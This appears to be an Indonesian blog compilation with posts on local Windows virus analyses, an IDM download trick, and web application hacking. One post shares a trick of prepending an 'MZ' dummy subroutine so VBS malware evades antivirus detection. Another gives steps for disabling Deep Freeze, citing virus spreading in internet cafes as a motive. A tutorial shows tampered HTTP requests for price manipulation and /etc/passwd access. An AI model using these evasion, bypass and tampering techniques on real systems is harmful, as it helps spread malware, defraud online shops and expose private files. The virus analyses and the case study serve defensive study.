toxic

the orbit exact intelegent connector

Trick IDM download di 4shared.com

hai reader pernahka anda mendowload sesuatu di sebuah website entah itu lagu atau apalah trus digiring ke 4shared.com/balalalalalalalalalalalalalalalalalall....../ untuk download lebih lanjut? bagi anda yang pernah download saya yakin pasti anda kesal nunggu link untuk downloadnya harus nunggu waktunya selesai!!!! untung2 kalu cuma 20 detik, lah kalu nunggu hampir 300 san detik? jengkel ga tu?waktu yang sangat banyak yang terbuang bagi za....................langsung aja nech


pada saat saat

pada saat link ini muncul klik dah tu gambar unduh sekarng(ya eayalah)






pada saat langkah diatas dilakukan ,,, pasti muncul gambar disamping,,,,(loch buat link downloadnya mana?) kalian harus nunggu waktu tersebut ampe muncul link downloadnya,,,(kelamaan ya?).
nechhh dia triknya pada saat gambar disamping tampil

1.lakukan CTRL + U : maksudnya disini agar kode dibalik tampilan tersebut di tampilkan
seperti ini:


pada saat code di balik web 4shared muncul..............
tekan CTRL + F untuk mempermudah pencarian.. tulis kata " unduh file sekarang" di kotak pencarian dan search......
pada saat kata tersebut di temukan/terblok dengan hitam,
nah...... kuncinya disitu......
sebelum kata "unduh file sekarang" ada sebuah link download yang sebenarnya
Copas (copy - paste) link tersebut ke ADD link pada IDM(internet download manager) anda dan Download dachhh tuchhhh, gak perlu nunggu waktu lagi

selamat bereksperimen.................

Setelah lama lama tidak pernah nongol di MORPHOSTLAB, (abisnya saya sibuk boz),,,,saya berusaha sebagai salah satu virus Captor untuk mencari di sana, disini dan dimana-mana malware ampe keluar negri segala (mode lebay = on) tapi lewat paman google hehe……ga ada hasil juga, saya berfikir kemana aja malware local, mungkin karena slogan dari Antivirus Sxmdxv “ virus lokal segera punah” membuat Vmaker kita ketakutan buat malware heheheheee, ga gitu kaleee, klo menurut saya virus lokal kita ini dari waktu kewaktu semakin menurun penyebarannya, hal ini dikarenakan banyak AV lokal yang sudah mampu memutus jalur infeksinya seperti MORPHOST AV dan Smadav (yang ada lubangnya) wakakakak,, maka dari itu peran saya sebagai virus Captor berkurang, sempat hampir putus asa saya minjam pc temanku dan melihat file “server.com” dan membukanya kok nga ada efek ya? Setelah saya ngecek cek wah port 5110 kebuka, saya berfikir wah ini mungkin semacam conficker, saya coba analisis aja sendiri, itung-itung latihan menganalisis. Dan hasil analisisku sbb.:

nama = server.com [berdasarkan file yang di dapat]

icon = Aplication

ukuran = 344 kb

membuka port 5110

[penyebaran]

C\WINDOWS\services.exe [icon bmp]

C\WINDOWS\system\sservices.exe [icon bmp]

C\WINDOWS\system32\fservice.exe[icon bmp]

[modul]

C\WINDOWS\system32\reginv.dll

C\WINDOWS\system32\winkey.dll

[registry dimodifikasi]

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell,

Explorer.exe C:\WINDOWS\system32\fservice.exe,Diubah

Dengan kata lain malware ini akan tereksekusi bila explorer,exe aktif , bukan begitu bang morphic?

Satu lagi dampaknya antivirus yang aktif proses atau tampilan akan disembunyikan sebagai bentuk pertahanannya

Klo ada kesalahan dari hasil analisa tolong diluruskan.

Awalnya saya terinspirasi dari seseorang pengguna Morphost yang mengirimi saya sebuah email yang isinya mengatakan bahwa dia senang dengan Morphost Antivirus. Dia pun sempat mengatakan bahwa semua koleksi atau malware vbs yang dia buat telah terdeteksi.
Tapi sayang, saya lupa siapa nama pengirimnya.

Setelah membalas emailnya, saya menjadi terus teringat-ingat malware vbs. Malware vbs yang sekarang ini telah menjadi bulan-bulanan antivirus lokal tampaknya harus diperjuangkan hidupnya.

Entah kenapa, tiba-tiba saya merasa harus menghidupkan kembali malware-malware script ini. Akhirnya saya pun berinisiatif untuk mengecek kembali seluruh code morphost yang berkaitan dengan scanning malware vbs.

Ternyata, saya menemukan satu kelemahan pada code Morphost dalam mendeteksi file vbs!!! Kelemahan yang fatal sekali!!!! SANGAT FATAL!!!

Lalu saya menguji beberapa antivirus lokal papan atas lainnya, apakah mereka juga melakukan hal fatal yang sama? Dan ternyata saya menemukan Smadav dan Pcmav. (saya sengaja menyebutkan nama kedua av ini secara lengkap supaya terindex di mesin pencarian.) Nanti saya akan jelaskan kenapa harus kedua av ini. Yang jelas intinya, Morphost, smadav dan pcmav melakukan hal yang fatal sekali.

Tujuan artikel ini saya tulis adalah untuk memberitahukan pada antivirus-antivirus lokal supaya memperbaiki antivirusnya dalam scanning vbs sekaligus membagikan trik agar virus vbs dapat lolos dari antivirus lokal.

Begini:
Coba kamu ketik “MZTOP” pada sebuah notepad lalu save dengan ekstensi vbs!!!
Coba jalankan!!! Apa yang muncul??? Yang muncul adalah ERROR.

Nah, sekarang coba ketikkan kode berikut:
MZTOP
Sub MZTOP()
Msgbox “Tess”
End Sub

Setelah kamu ketik keempat baris code tersebut, jalankan lah!!
Maka akan muncul pesan yang isinya “Tess”

Kenapa harus “MZTOP”? Sebenarnya tidak harus kata itu. Terserah kata apa saja, asal harus diawali “MZ”. Saya yakin semua sudah tahu file apa yang biasanya scriptnya diawali “MZ”. Jadi tidak perlu lagi saya tuliskan disini. Ntar kesannya seolah-olah mengajari…

Artinya begini, kode “Msgbox” itu boleh kamu gantikan dengan script virus kamu…
Dan coba lah scan!!! Separah apapun string atau script code virus yang kamu pakai, tidak akan terdeteksi.

Kamu bisa buktikan sendiri…

Ada lima antivirus yang saya uji…
Kelima antivirus tersebut adalah Morphost, Pcmav, Ansav, Smadav dan CMC.

Lima antivirus ini saya uji pada 5 file virus vbs yang tergolong “GOOD DETECTION”. Sekitar beberapa minggu yang lalu saya dikirimi banyak malware vbs. Saya lupa siapa pengirimnya. Yang jelas dari sekian banyak file vbs disitu, ada satu folder yang dinamai “GOOD DETECTION”

Dan hasilnya sebagai berikut. (maaf, saya tidak menampilkan screenshot-nya)
-Morphost = 5 (100%)
-Pcmav = 5 (100%)
-Smadav = 5 (100%)
-Ansav = 2 (40%)
-CMC = 0 (0%)

Karena CMC tidak mendeteksi satupun file vbs-nya, jadi saya tidak mengikutsertakan CMC pada tes ini. Dan saya akan menguji Morphost, Pcmav dan Smadav terlebih dahulu. Ansav mendapat giliran paling terakhir.

Bagaimana pengujiannya?

Saya masukkan kode berikut:
MZTOP
Sub MZTOP()
End Sub

Tiga baris kode yang fatal.
Masukkan kode tersebut pada awal script virus, maka malware tersebut bakal lolos dari deteksi.
Saya sudah coba. Dan saya masukkan kode tersebut pada 2 file saja. Lihat hasil berikut ini.

Ketiga antivirus tersebut hanya mendeteksi 3 dari 5 malware vbs saja.

Ini merupakan hal yang sangat fatal!! Malware vbs yang dianggap rendahan selama ini mampu lolos!!!!!!

Untungnya saya sudah melakukan perbaikan segera pada Morphost. Morphost terbaru yang kebetulan belum dirilis sudah mampu mengatasi masalah in!

Dengan Morphost terbaru 5 dari 5 file malware vbs terdeteksi!

Semoga para programmer pcmav dan smadav serta programmer antivirus lokal lain menanggapi hal ini. Terima kasih.

Sekian
By:Morphic Karta

http://www.morphostlab.com

http://www.morphostlab.co.nr

Friend’s Link:
-http://www.safe-computing.co.cc
-http://yudha-arch.blogspot.com
-http://antiviri.webs.com
-http://kudosoft.co.nr

AMBURADUL BANGKIT DARI KUBURNYA

dan lagi lagi aku mengcopy postingan dari morphostlab untuk menu hari ini

Setelah dicek-cek ternyata sampel amburadul pun masih berserak di dunia maya..

Begini detailnya:

Nama Virus : Amburadul [Morphost], VirusBaru[J] dengan heuristik Morphost.
Ukuran Virus : 117,760 bytes
MD5 virus : A136431BADD796EE3623301F3D11EA33
CRC32 Virus : 9871B69B

PROSES VIRUS YANG AKTIF:
-csrss.exe
-smss.exe
-lsass.exe
-services.exe
-winlogon.exe
-~Paraysutki_VM_Community~

PENYEBARAN VIRUS:
-C:\autorun.inf
-C:\Friendster community.exe
-C:\MyImages.exe
-C:\PalMa.exe
-C:\J3MbataN K4HaYan.exe
-C:\FoToKu 16-11-2009.exe (File ini sesuai kapan tanggal virus diekesekusi)
-C:\Windows\linkinfo.dll (awalnya, aku pikir ini alman.)
-C:\windows\temp\Amburadul_List².txt (file ini berisi nama-nama file yang disembunyikan oleh virus. File-file yang disembunyikan biasanya file gambar yang ada di flashdisk. Dan si virus menduplikatkan dirinya sesuai dengan nama file yang disembunyikan. Amburadul melakukan hal ini supaya dia tahu file-file apa saja yang sudah disembunyikan dan mana yang belum.)
-C:\WINDOWS\system32\~A~m~B~u~R~a~D~u~L~²\~Paraysutki_VM_Community~
-C:\WINDOWS\system32\~A~m~B~u~R~a~D~u~L~²\lsass.exe
-C:\WINDOWS\system32\~A~m~B~u~R~a~D~u~L~²\services.exe
-C:\WINDOWS\system32\~A~m~B~u~R~a~D~u~L~²\winlogon.exe
-C:\WINDOWS\system32\~A~m~B~u~R~a~D~u~L~²\csrss.exe
-C:\WINDOWS\system32\~A~m~B~u~R~a~D~u~L~²\smss.exe
-C:\Images\M0D3L_P4ray_ 2009.exe
-C:\Images\MalAm MinGGuan.exe
-C:\Images\TrenD 9aya RAm8ut 2009.exe
-C:\Images\PiKnIk dT4ngKilin9.exe
-C:\Images\_PAlbTN\GePaCar4an Neh!!!.exe
-C:\Images\_PAlbTN\Ma5tURbas1 XL1M4xs.exe
-C:\Images\_PAlbTN\Ke.. TaUan N90C0k.exe
-Amburadul juga melakukan duplikasi pada flashdisk kalo ada file gambarnya… Jumlah duplikat virus sama dengan file gambar yang ada.

Sebenarnya sih, virus ini sudah terdetek oleh heuristik Morphost. Lihat gambar dibawah ini:

Namavirusnya “Virus Baru [J]”

Sementara untuk regedit yang dimodif, tertulis digambar di bawah ini. Sayangnya, saya malas untuk mengetiknya kembali. He he he…
Jadi di zoom aja ya…

Perinciannya sebagai berikut:

Dan sekali mohon maaf, tools Green Registry ini belum bisa kalian dapatkan.
Ternyata, virus amburadul ini belum habis juga. He he he… Tapi yang jelas virus ini belum bisa dikategorikan VirusAbadi.

Sampai saat ini, MorphostLab sudah mencatat dua virus yang masuk ke dalam kategori VirusAbadi, yaitu Alman dan Sality. Sedangkan Conficker dan Virut masih dalam penangguhan.

Oke, sekian dulu.

Byeee

Analyzed by: Morphic
http://www.morphostlab.co.nr
karta_morphic@yahoo.co.id

Hellspawn is coming back!

Pernah mendengar nama Hellspawn? Ato pernah mendengar karyanya?
Virus Moonlight!

Ya. Hellspawn dulu pernah membuat Moonlight.

Dan sepertinya dia mencoba virus yang baru lagi nih! Begini analisanya.

Virusname : Hellspawn [Morphost]
Size : 57,378 bytes
Icon : folder

Virus ini suka dengan filename yang random.
Kebetulan kali ini saya tidak menyertakan hasil regedit-nya karena alasan tidak sempat.
Tapi untuk penyebaran filenya bakal saya tulis di artikel ini.

Virus ini menyebar/membuat file ke:
-berduplikat sesuai nama folder yang ada (di flashdisk)
-C:\windows\u8GoTyspawn.cmd (yang ini pasti random!)
-C:\windows\u8GoTy\service.exe (nama foldernya random!)
-C:\windows\u8GoTy\winlogon.exe (nama foldernya random!)
-C:\windows\system32\zsi2rc8a.exe (nama filenya random!)
-C:\windows\system32\dRn3N2S43.exe (nama filenya random!)
-C:\windows\system32\2si2rc8\smss.exe (nama foldernya random!)
-C:\windows\system32\2si2rc8\lsass.exe (nama foldernya random!)
-Pada folder startup startmenu ada nama file “msdos.cmd”
-Pada My documents ada file html dengan nama file “about.html”

Sekali lagi maaf, karena dalam artikel kali ini tidak ada hasil analisis regedit yang dirusak. Tapi kamu bisa pakai Morphost untuk memperbaiki regedit-regedit umum yang dirusak.

CARA PENCEGAHAN
-hati-hati membuka folder yang ada di flashdiskmu. Karena semua folder yang ada di flashdiskmu disembunyikan dan semua virusnya bakal memanfaatkan kelalaianmu. Virusnya berduplikat sesuai nama-nama folder yang ada di flashdiskmu.
-Scan flashdiskmu dengan Morphost atau antivirus lain.
-Pakai mesin tik untuk mengurangi penyebaran virus ini.

CARA PEMBERSIHAN / PENGOBATAN
-Scan komputermu dengan Morphost antivirus. Pakai database terbaru.

By:Morphic

Virus Sabotage pemblokir Antivirus Lokal

Virus sabotage merupakan salah satu virus dari sekian banyak virus lokal yang memblokir antivirus lokal. Dan menurut kami, sabotage ini virus yang memblok banyak antivirus lokal termasuk morphost.
Dari banyak virus lokal, ini adalah satu-satunya virus atau bisa dibilang juga virus pertama yang menanggapi antivirus morphost. Maksudnya melakukan pertahanan terhadap morphost.
Biasanya virus-virus lokal biasanya melakukan defense terhadap antivirus-antivirus lokal yang “biasanya sudah sering kita dengar.”
Mungkin antivirus Morphost terbilang baru dalam dunia pervirusan. Wah, wah. Selama ini yang kami anggap Morphost adalah antivirus aman, ternyata kini sudah punya musuh. Tapi yang jelas morphost sudah masuk hitungan. He he he…

Virus Sabotage
Masih belum jelas apa nama virus ini. Dan virus ini termasuk virus baru. Virus yang baru kami terima maksudnya. He he he…
Masih belum banyak AV luar yang mendeteksi virus ini. Yang sudah mendeteksi virus ini antara lain:
-Sophos (Mal/Generic-A)
-Ikarus (BAT.Trojan.FormatCQ)
-Kaspersky (packed with: PE_Patch.UPX)

Ukuran virus ini sekitar 39 – 41 KB dan memiliki MD5=3BC9E3894B7D6ACA2D504DFB4638D427.
Sederhananya virus ini:
-membuat startup
-memblok akses ke website security.
-mengubah registry
-memblokir eksekusi antivirus
-dan lain-lain.

Nilai registry yang dimodif banyak sekali. Pengeksekusian beberapa software / antivirus dialihkan dengan trik “Image File Execution Options”. Aku rasa kalian sudah tahu itu.

Di folder windows, virus ini menduplikat dirinya dengan filename “ssms.exe” bukan “smss.exe”. he he he.. emang yang itu juga harus diperhatikan supaya gak salah terminate nantinya. He he he

Virus ini juga mendelete file msvbvm60.dll di folder system32. Wah, ribet juga nih! Tapi sebagai gantinya virus ini membuat file msvbvm60.5737 di folder yang sama.

Perlu diperhatikan. Kalau kamu memang pengen menghidupkan morphost, artinya kamu harus menyediakan file msvbvm60.dll dan sekaligus merename nama morphost.exe. OKe!

Sebenarnya masih banyak lagi hal lain dari virus ini…

Sekian artikel kali ini

By:Morphic
http://www.morphostlab.co.nr

thanks to:
-Yudha

Tambahan:::
ini gambar dari file “C:\sabotage.txt”
sabotageb

Tiga langkah matikan deepfreeze

sebenarnya trik ini sudah ada sejak agustus lalu di blognya morphostlab ya untuk meramaikan postingan blog aku !!!!!!!

Alasan kenapa anda ingin matikan deepfreeze adalah:
1. ingin nyebarin virus diwarnet (warnet-nya pake deepfreeze)
2. lupa password-nya jadi gak bisa nyimpan file di komp kesayangan kalian.

Itu dua alasan paling dominan…

Oke begini caranya…

Kamu harus tahu dulu kapan deepfreeze-nya terinstall…
Kalo gak tahu jga gak apaapa sih…

Langkah pertama.
Hidupkan komputermu lalu masuk ke BIOS cuy. Dan ubah waktunya menjadi sebelum waktu deepfreezenya terinstall. Kalo gak tahu kapan deepfreeze-nya terinstall silakan ubah aja waktunya menjadi 3 tahun yang lalu.

Langkah kedua.
Restart kompmu. Trus waktu masih booting tekan tombol F8 di keyboardmu. Nanti muncul suatu tampilan. Disitu ada muncul daftar pilihan booting. Pilih Start Windows in Debug Mode.

Langkah ketiga.
Udah itu tunggu sampe muncul gambar Welcome. Waktu masih muncul welcome langsung cepat-cepat hidupkan taskmanagermu (tekan Ctrl+alt+del). Ingat! Usahakan sebelum muncul wallpaper komp-mu. Usahakan selagi kompmu masih menampilkan welcome.
Lalu matikan process “DF5Serv.exe” dan ”Frzstate2k.exe”.

Udah beres cuy! Itu tadi 3 langkah matikan deepfreeze. Selebihnya kalian perbaiki sendiri komp kalian. Misalnya memperbaiki waktu di komputer kalian dan menguninstall deepfreeze kalian.
Tapi yang jelas deepfreeze udah non-aktif. Deepfreeze kalian udah Thawed.

Sekian tutorial ini.

Teknik-teknik Hacking pada Web aplikasi

Ada beberapa teknik hacking pada web aplikasi diantaranya adalah sebagai berikut:

1. Hidden Manipulation

Field-field tersembunyi sering digunakan untuk menyimpan informasi tentang sesi klien, untuk menjaga kompleksitas database pada server side. Seorang klien biasanya tidak melihat field tersembunyi dan juga tidak berusaha untuk mengubahnya. Bagaimanapun juga memodifikasi form field sangatlah sederhana. Sebagai contoh , marilah kita anggap bahwa harga sebuah produk disimpan dalam field tersembunyi. Seorang hacker dapat mengubah harganya, seperti berikut ini :

* Membuka sebuah halaman html dengan HTML editor.
* Menempatkan sebuah field tersembunyi (contoh., “”)

* Memodifikasi nilainya dengan nilai yang berbeda (contoh. “”)

* Menyimpan file html ditempat itu dan mem-browse-nya.
* Mengklik tombol “buy” untuk menampilkan e-shoplifting melalui hidden manipulation.

2. Parameter Tampering (Perusakan Parameter)

Kegagalan untuk mengkonfirmasi kebenaran dari parameter-parameter Common Gateway Interface (CGI) yang tersimpan dalam hyperlink., dapat dengan mudah digunakan untuk mematahkan keamanan situs. Seperti di bawah ini :

Search.exe?template=result.html&q=security

Dengan mengganti parameter template, seorang hacker dapat memperoleh akses menuju file yang diinginkannya,

seperti /etc/passwd atau private key situs contoh : Search.exe?template=/etc/passwd&q=security

3. Cookie Poisoning

Umumnya Web aplikasi menggunakan cookie dengan tujuan untuk menyimpan informasi (user id, time stamp, dan lain-lain.) pada sisi klien. Sebagai contoh, ketika seorang user log ke beberapa situs, sebuah login CGI memvalidasi user name-nya dan password-nya dan mengeset sebuah cookie dengan identifier numerik-nya. Ketika user mengecek preference-nya kemudian, CGI yang lain (sebut saja, preferences.asp) me-retrive cookie dan menampilkan catatan-catatan user information sesuai dengan user-nya. Data-data yang tersimpan dalam cookie tidaklah aman, seorang hacker dapat memodifikasi-nya, jadi informasi yang terdapat pada cookie tersebut dapat dicuri dan dimanfaatkan oleh hacker.

III. Perampokan Acme Fashion, Inc.

Pada pertengahan th 1990an, ketika popularitas Web sedang menanjak, wakil manajer pemasarannya memutuskan untuk membuat situs www.acme-fashions.com bagi perusahaannya dan meletakkan dan meletakkan semua katalog di sana. Tim marketing kemudian sibuk membuat halaman HTML dan mengkonversi katalog-katalognya dalam bentuk elektronis.

Tetapi, begitu ada penjualan melalui situs Web tersebut, muncul juga keluhan-keluhan pelanggan. Kebanyakan keluhan ditujukan kepada departemen keuangan dan gudang. Departemen keuangan sering menerima keluhan mengenai produk yang dijual berharga lebih rendah daripada harga yang ditetapkan, padahal tidak ada diskon atau promosi yang ditawarkan. Karyawan di bagian pengiriman sering bingung sewaktu mereka mendapat order pengiriman dengan jumlah barang tertulis dalam angka negatif. Ketika kerugian hampir mencapai 100.000 dolar, akhirnya pihak direksi memanggil tim ahli sekuriti.

3.1. Melacak Masalah

Toko Web Acme – www.acme-fashions.com – telah menerapkan beberapa teknologi berikut ini:

Sistem Operasi Microsoft Windows NT 4.0

Web Server Microsoft Internet Information Server (IIS) 4.0

Katalog Online Template dan Active Server Page (ASP)

Database back-end Microsoft Access 2.0

Shopping Troli Shopcart.exe

Katalog HTML dibuat dengan menggunakan template dan Active Server Pages. Tim pemasaran pernah menggunakan FoxPro untuk database-nya dan menghasilkan halaman katalog HTML secara otomatis. Kemudian database Fox-Pro itu dikonversi ke dalam database Microsoft Access dan antarmukanya memakai ASP. Aplikasi trolli belanjanya, Shocart.exe, di setup pada server, serta template ASP didesain untuk menghasilkan HTML yang terhubung dengan aplikasi troli belanja. Troli belanja mengambil informasi produk dari HTML tersebut. Saat itu, kelihatannya semua cara itu sangat mempermudah dan mempercepat kesiapan toko elektronis dan bisa online sebelum deadline.

Shopcart.exe mempunyai sistem session management-nya sendiri, untuk menjalankan sesi troli belanja, yang bergantung pada cookie dan server-side session identifier. Karena tidak dimungkinkan untuk memodifikasi Shopcart.exe, tugas-tugas untuk memvalidasi input diserahkan ke JavaScript yang bekerja pada browser pelanggan.

3.2. Bahaya Tersembunyi pada Field-Field Tersembunyi

Setelah dipelajari ternyata ditemukan sebuah lubang pada cara penerapan sistem troli belanja. Dimana satu-satunya cara untuk menghubungkan harga dengan produknya melalui tag-tag tersembunyi pada halaman HTML. Gambar 3.1. menunjukkan halaman yang menampilkan baju-baju dan katalog di http://www.sceme-fashions.com.

Setiap baju memiliki hubungan dengan form penerimaan kuantitas baju yang dibeli dan terhubung juga dengan troli belanja. Pada kode HTML seperti yang diperlihatkan pada gambar 3.2. juga dapat ditemukan kelemahannya, yakni pada beberapa baris terakhir.

Source code berikut ini digunakan untuk memanggil Shopchart.Exe:

Quantity:

Sewaktu user mengklik tombol Buy, browser men-submit semua field input ke server, menggunakan request POST. Ada tiga field tersembunyi pada baris 2, 3, dan 4 dari kode tersebut. Nilai-nilainya juga terkirim bersama dengan request POST. Dengan demikian, sistem membuka suatu kelemahan pada tingkat aplikasi, karena user bisa saja memanipulir nilai dari field tersembunyi sebelum men-submit-nya ke form.

Untuk memahami situasi ini secara lebih baik, maka dapat kita perhatikan secara seksama request HTTP yang berasal dari browser ke server:

POST /cgi-bin/shopcart.exe/MYSTORE-AddItem HTTP/1.0

Referer: http://www.acme-fashions.com/shirtcatalog/shirts2.asp

Connection: Keep-Alive

User-Agent: Mozilla/4.76 [en] (Windows NT 5.0; U)

Host: www.acme-fashions.com

Accept: image /gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding:gzip Accept-Language: en

Accept-Charset : iso-8859-1,*,utf-8

Cookie: ASPSESSIONIDQQGQQKIG=ONEHLGJCCDFHBDHCPKGANANH; shopcartstore=3009912

Content-type: application/x-www-form-urlencoded

Content-lengt: 65

PartNo=OS0015&Item=Acme+Shirts&Price=89.99&qty=1&buy.x=16&buy.y=5

Nilai dari field tersembunyi PartNo, Item dan Price di-submit dalam request POST ke /cgi-bin/shopcart.exe. Itulah cara satu-satunya Shopcart.exe mengambil harga, misalnya baju nomor OS0015. Browser menampilkan respon yang ditunjukkan pada Gambar 3.3.

Oleh karena request POST dikirim bersama dengan nilai yang bisa dimodifikasi pada field price, user pun bisa mengontrol harga baju tersebut. Request Post berikut ini menunjukkan bahwa harga baju yang semula 89.99 dolar diubah menjadi 0,99 dolar.

POST /cgi-bin/shopcart.exe/MYSTORE-AddItem HTTP/1.0

Referer: http://www.acme-fashions.com /shirtcatalog/shirts2.asp

Connection: Keep-Alive

User-Agent: Mozilla/4.76 [en] (Windows NT 5.0; U)

Host: www.acme-fashions.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding:gzip Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

Cookie: ASPSESSIONIDQQGQQKIG=ONEHLGJCCDFHBDHCPKGANANH; shopcartstore=3009912

Content-type: application/x-www-form-urlencoded

Content-length: 64

PartNO=OS0015&Item=Acme+Shirts&Price=0.99&qty=1&buy.x=16&buy.y=5

Cara mudah untuk mengubah-ubah harga adalah dengan menyimpan halaman katalog, shirts2.asp, menampilkannya pada browser sebagai salinan lokal, shirts2.html, di hard disk user, mengedit file tersebut, dan mengubah – ubah kode HTMLnya. Gambar 3.4. menunjukkan bagaimana user menyimpan halaman tersebut.

User pertama-tama mengubah nilai pada field price pada baris . Perubahan berikutnya adalah pada link ACTION=dalm tag

. Link yang dituju adalah http://www.acme-fashions.com/cgi-bin/shopcart.exe. Gambar 3.5. menunjukkan file shirts2.html setelah memodifikasi harga menjadi 0,99 dolar.

Sekarang, jika user membuka file yang sudah dimodifikasi ini, shirts2.html, pada browser dan men-submit request untuk membeli pakaian, dan melihat window seperti ditunjukkan pada gambar 3.6.

Seperti yang dapat kita lihat, hal inilah yang membuat Acme-Fashions menderita kerugian. Setelah melakukan penelitian menyeluruh pada semua order dan transaksi, tim pemeriksa keamanan menemukan juga bahwa sejumlah besar ”pelanggan” bisa membeli barang dalam harga yang sangat rendah. Kata ”pelanggan” dalam konteks ini mengandung arti para hacker.

3.3. Mem-Bypass Validasi Client Side

Kesalahan lain yang ditemukan oleh tim peneliti keamanan adalah cara input divalidasi sebelum dilewatkan ke Shopcart.exe. Aplikasi Web terdiri dari banyak script dan komponen interaktif. Semua itu terutama untuk berinteraksi dengan user melalui form HTML pada browser. Bagian interaktif dari tiap komponen mengambil input dari form HTML dan memprosesnya pada server. Form HTML berciri generik bila berfungsi sebagai pengambil data, dan tak ada cara lain untuk menjamin validasi data di dalam form seperti itu. Misalnya, bila sebuah form HTML didesain untuk menerima tanggal, user bisa saja memasukkan tanggal seperti ini: 99/88/77 dan browser tidak mempedulikannya. Aplikasi harus memiliki mekanisme validasi inputnya sendiri untuk mem-filter input-input yang salah bentuk atau tidak sesuai dengan kriteria yang sudah ditentukan pada aplikasi. Validasi input untuk form HTML bisa dilakukan baik pada server-side dengan Perl, PHP, atau ASP, dll. Juga dapat dilakukan pada client-side dengan menggunakan bahasa script seperti JavaScript atau Vbscript.

Tim pengembangan Acme menyadari kebutuhan validasi input seperti itu. Tetapi, karena Shopcart.exe merupakan aplikasi yang berciri Prepackaged (tidak bisa dimodifikasi lebih lanjut), maka ia tidak bisa dimodifikasi untuk bisa menggabungkan validasi input dengan script client-side pada browser-nya sendiri, mungkin dengan tujuan untuk menghemat penggunaan CPU server, sehingga pekerjaan itu dijalankan oleh browser klien.

Namun, kenyataannya mekanisme client-side manapun bisa diubah-ubah dengan cara mengedit atau mengganti-ganti source code HTML yang diterima oleh browser. Tim penguji keamanan menemukan beberapa contoh validasi client-side yang digunakan pada www.acme-fashion.com. Gambar 3.7. menunjukkan validasi input sedang dijalankan pada sistem Acme. Seorang user berusaha membeli sejumlah ”-5” pakaian dan sebuah peringatan muncul bahwa user memasukkan nilai yang salah.

Berikut ini adalah kode JavaScript untuk memvalidasi input yang dipisahkan dari elemen-elemen HTML-nya.

function validate(e) {

if(isNaN(e.value) || e.value <= 0) {

alert (“Please enter a valid number”) ;

e.value = 1;

e.focus();

return false;

}

else {

return true;

}

}

:

:

Kode ini memastikan bahwa hanya angka positif saja yang diperbolehkan pada field qty. Tetapi, karena validasi ini dilakukan oleh script client-side, maka bisa dengan mudah di-bypass. Menonaktifkan eksekusi JavaScript dengan cara men-setting preferensi browser bisa membuat hacker mem-bypass validasi pada client-side. Jika kita memasukkan nilai apa saja yang diinginkan pada field-field input.

Gambar 3.8. menunjukkan bagaimana menonaktifkan JavaScript pada Netscape. Sekarang jika user memasukkan nilai ”-3”, browser akan mengeluarkan request POST berikut ini pada server.

POST /cgi-bin/shopcart.exe/MYSTORE-AddItem HTTP/1.0

Referer: http://www.acme-fashions.com /shirtcatalog/shirts2.asp

Connection: Keep-Alive

User-Agent: Mozilla/4.76 [en] (Windows NT 5.0; U)

Host: www.acme-fashions.com

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding:gzip Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

Cookie: ASPSESSIONIDQQGQQKIG=ONEHLGJCCDFHBDHCPKGANANH; shopcartstore=3009912

Content-type: application/x-www-form-urlencoded

Content-length: 63

PartNo=OS0015&Item=Acme+Shirts&Price=-3&qty=1&buy.x=16&buy.y=5

Selanjutnya dapat kita lihat bagaimana request HTTP ini bisa mem-bypass seluruhnya validasi input pada client-side. Gambar 3.9. menunjukkan respon pada server.

Pada layar tampak bahwa user telah membuat pesanan untuk 5 baju masing-masing seharga 55,99 dolar, dan hari berikutnya membeli -3(minus 3) baju masing-masing seharga 89,99 dolar. Total biaya adalah 4,98 dolar. Kemampuan untuk meletakkan angka negatif pada jumlah pembelian bisa membuat si pembeli kegirangan. Kecacatan inilah yang menyebabkan karyawan pengiriman Acme menerima order jumlah item dengan angka negatif.

3.4. Menghadapi Masalah Baru pada Sistem yang Telah Diteliti

Sebelumnya, pihak direksi Acme sudah berhadapan dengan dan mengatasi masalah-masalah menyangkut pengubahan nilai harga barang selama belanja musim liburan yang baru lalu. Sepertinya hal itu belum cukup, sekarang Acme menghadapi masalah lagi. Kali ini berhubungan dengan pencurian kartu kredit. Pihak direksi memanggil lagi tim ahli keamanan komputer untuk menganalisis masalah tersebut.

Tim itu menemukan bahwa pada semua log di Web server selama bulan Agustus, tidak ada entri satu pun untuk tanggal 29 Agustus. Tim yakin bahwa hal itu disebabkan oleh hacker yang menghilangkan file C:\WINNT\ System32\ LogFiles\ W3SVC1\ ex20010829. log yang berisi data log untuk tanggal itu. Ukuran file-nya pun direduksi menjadi 0 byte. Ini menunjukkan bahwa hacker pasti sudah memasuki kontrol administratif pada server agar bisa menghapus log-log pada Web server IIS.

Karena tidak ada catatan yang bisa diteliti lebih lanjut, akhirnya tim tersebut hanya bisa berspekulasi mengenai penyebab serangan. Penyelidikan yang menyeluruh pada sistem hard disk menghasilkan bahwa file ”purchases.mdb” ada pada dua direktori.

C: \>dir purchases.mdb / s

Volume in drive C is ACMEFASHION

Volume Serial Number is 48CD-A4A0

Directory of C:\ACMEDATA

08/29/2001 08:13p 2,624,136 purchases.mdb

1 files(s) 2,624.136 bytes

Directory of C:\Inetpub\wwwroot

08/29/2001 08:33p 2,624,136 purchases.mdb

1 files(s) 2,624,136 bytes

Total Files Listed:

2 File(s) 5,248,272 bytes

0 Dir(s) 111,312,896 bytes free

Bagaimana file purchases.mdb bisa dikopi dari direktori C:\ACMEDATA ke C:\Inetpub\wwwroot? Administrator sistem di Acme Fashion menyatakan bahwa purchases.mdb dipakai untuk menampung informasi order pelanggan, termasuk nama, alamat pengiriman, alamat tagihan, iem yang dibeli dan kartu kredit yang digunakan untuk untuk membayar item-item tersebut. Pihak yang mendesain aplikasi meyakinkan direksi bahwa file database berada di luar root dokumen server (c:\inetpub\wwwroot0. Tim ahli keamanan menyimpulkan bahwa, karena salinan dari file purchase.mdb dibuat pada jam 11:33 p.m tanggal 29 Agustus 2001, telah terjadi penyalahgunaan kartu kredit oleh hacker. Hacker pasti telah menyalin file dari C:\ACMEDATA ke C:Inetpub\wwwroot dan men-download-nya pada browser menggunakan request http://www.acme-fashions.com/purchase.-mdb. Tetapi, ia rupanya lupa menghapus salinan file pada direrktori C:\Inetpub\wwwroot setelah men-download-nya.

